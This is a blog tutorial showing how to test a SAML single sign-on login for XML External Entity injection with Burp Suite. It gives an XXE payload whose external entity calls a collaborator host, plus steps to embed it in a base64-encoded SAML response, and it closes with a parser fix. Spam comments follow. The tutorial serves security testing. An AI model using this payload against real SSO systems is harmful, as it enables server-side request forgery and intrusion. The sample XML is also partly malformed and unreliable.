Friday, January 13, 2017

SAML Security XML External Entity Attack

XML External Entity Attack(XXE) in SAML based SSO application

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts

We need collaborator server so that we can insert the unintended XML containing unauthorized url or file location on the server.Collaborator server wil as act as proxy server for intruder's URL.
It will intercept all the request cooming from original company's ip to collaborator server.

We need saml-raider extensionalso for capturing saml response if our request using the saml content.
Burp professional provides the saml-raider as extension .So we have to download saml-raider jar for the installed burp version  and import it through Burp Extender tab->Extensions tab ->load the raider jar


Suppose our affected url is:  https://testcompany.com/saml.html

Above url is used for logging in through a html(for example test.html provided by the SSO provider)  file which sends request 
to our url with a SAML response

suppose our test.html has below source code,It has only a submit button and a hidden param.
on click on submit button user is logged in using samlResponse param.
our aim is to corrupt the samlResponse param value and send a request to unintended server.

<html><body>
<form method="POST" action="https://testcompany.com/saml.shtml">
<input type="hidden" name="SAMLResponse" value="aGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm" />
<input type="submit" name="Post Saml Response" value="Post Saml Response"/>
</form>
</body></html>

Step1: Download burp tool (we need burp professional for this)
Step2: Go to burp tool -> click on tab project options
Step3: Use the default collaborator server 
Step4: Click the "Run Health check" to confirm if the default collaborator server is running.
Step5: Click on Burp menu  and click on burp collaborator client
Step6: Intercept the request through burp proxy and go to repeater it will have raider tab copy the saml response,saml response is the XML file

Step7: Now we have to send our malicious Xml in the SAML response to the target URL



for example intruder's XML is

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://Collaborator Server's URL" >]>

<foo>&xxe;</foo>

Step8: To test that our affected server is making unintended request to intruder's server
We will pose default collaborator as the intruder's server url
Step9: To get out default collaborator server url go to burp collaborator client and click "copy to clip board button" it will copy the server's URL ,it should be someting like this 10pn7ed51u.burpcollaborator.net 
Now replace it in the  XML chunck used for attack
Now XML will look like below

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://10pn7ed51u.burpcollaborator.net " >]>

<foo>&xxe;</foo>


Now insert our SAML response between <foo> and </foo> tags  and post the saml response

for example intruder's new XML ready for attack will be something like this,url highlighted is the url acting as intruder's url

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://10pn7ed51u.burpcollaborator.net " >]>

<foo>&xxe;
<samlp:Response ID="d4_kS-guM6wiWqkSLdWESYZ8DGv"
  IssueInstant="2016-12-21T19:15:11.418Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://www.xyz.com.com/enterprise-central</saml:Issuer>
  <samlp:Status>
    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
  </samlp:Status>
  <saml:Assertion ID="YzZoJdNiWwkrRrz3pljoYUvX3Lb"
    IssueInstant="2016-12-21T19:15:11.480Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
    <saml:Issuer>https://www.xyz.com/enterprise-central</saml:Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
      </ds:SignedInfo>
      <ds:SignatureValue>

</ds:SignatureValue>
/<saml:Assertion>
</samlp:response>
</foo>

As our Saml response in the original request was base64 encoded so Now we have created new XMl for SAML response with attack code inserted ,Now Copy the above SAML response and make it base 64 encoded using any online tool .

Step10: Now open our test.html to login through SSO intercept through burp tool
send it to repeater and now in the request param replace the existing value for samlResponse with newly encoded value.Now send the request

Step11:Expected result a request from our server (testcompany.com) is sent to unintended serer(burpcollaborator.net) as we have inserted a doctype with url in the post request.

Step12:We can verify it by refreshing the list in the burp collaborator client it shows that request from ip of our test company captured at collaborator server.

This way it is reproduced.

How to fix:

The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:


factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);


Note : delete the saml resposne
Copy the intruder's  xml replace the server name with collaborator client 
Now copy the xml and make it base 64 encoded using online tools
now copy this encrypted xml and  past in the value to post request parameter named "SAMLResponse".
Click the button go
Now if the attack is happneed then our collaborator server should get the request from the url where we have posted our request.


References:

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

18 comments:

  1. Islamic State's deadly drone program, U.S. officials say, but counter-terrorism experts warn that the terrorist group’s innovative Serious Security CCTV Bayswater

    ReplyDelete
  2. https://diceware.blogspot.com/2012/06/just-add-salt.html?showComment=1568207575823#c5532949843415774115

    ReplyDelete
  3. I see some amazingly important and kept up to length of your strength searching for in your on the site security company

    ReplyDelete
  4. I just got to this amazing site not long ago. I was actually captured with the piece of resources you have got here. Big thumbs up for making such wonderful blog page! security company

    ReplyDelete
  5. Just saying thanks will not just be sufficient, for the fantasti c lucidity in your writing. I will instantly grab your rss feed to stay informed of any updates. security guards

    ReplyDelete
  6. It has fully emerged to crown Singapore's southern shores and undoubtedly placed her on the global map of residential landmarks. I still scored the more points than I ever have in a season for GS. I think you would be hard pressed to find somebody with the same consistency I have had over the years so I am happy with that. security company

    ReplyDelete
  7. Facebook is the best social media app, to change the name on the Facebook app, review the name standards. Then, open your Facebook app and tap and scroll down and tap on Settings and Privacy and after that, tap on Settings. Tap on Personal Information and after that, tap on Name. After that, enter your name and tap on Review Change and enter your password and tap on Save Changes. Call on +44-800-368-9067 to get connected with the technical experts for instant support.
    Facebook Help Number UK.

    ReplyDelete
  8. Just pure brilliance from you here. I have never expected something less than this from you and you have not disappointed me at all. I suppose you will keep the quality work going on. rastreo satelital de autos

    ReplyDelete
  9. I found this BLOG informative which helps better assistance to cash app transfer failed. So, Do you need to know the reasons of the same i.e., why is my cash app payment failing Then, check out the official website of cash app desk. We provide accurate information to all our clients. The team specifically works thoroughly to provide seamless informative contents. Also, we are responsible for boosting the client's engagement.To know more, visit us at: www.cashappdesk.com

    ReplyDelete
  10. I’m not sure where you are getting your information, but good topic. I needs to spend some time learning much more or understanding more. Thanks for great information I was looking for this info for my mission. close protection chauffeur London

    ReplyDelete
  11. Good to become visiting your weblog again, it has been months for me. Nicely this article that i've been waited for so long. I will need this post to total my assignment in the college, and it has exact same topic together with your write-up. Thanks, good share. Application

    ReplyDelete
  12. It's late finding this act. At least, it's a thing to be familiar with that there are such events exist. I agree with your Blog and I will be back to inspect it more in the future so please keep up your act. Application

    ReplyDelete
  13. Visit Spy Camera Solution at India’s best security cameras Online Shopping Store. Spy Camera India offers Secret Cameras, Mobile Jammer, Audio Voice Recorder, Magic Crds, Monitoring Software, GPS Tracker Device, and more (9999332499, 9999332099).

    ReplyDelete

  14. Thanks for sharing this informative blog. Nowadays, Security is more important because criminal activities are triggered by default. Call Now (9999332499, 9999332099) for Spy Camera in Delhi NCR. Buy now unique quality of Hidden Secret Cameras at reasonable price.


    ReplyDelete
  15. This post will be very useful to us. I like your blog and helpful to me. nice thoughts for your great work.

    Wiring Security Cameras Miami

    ReplyDelete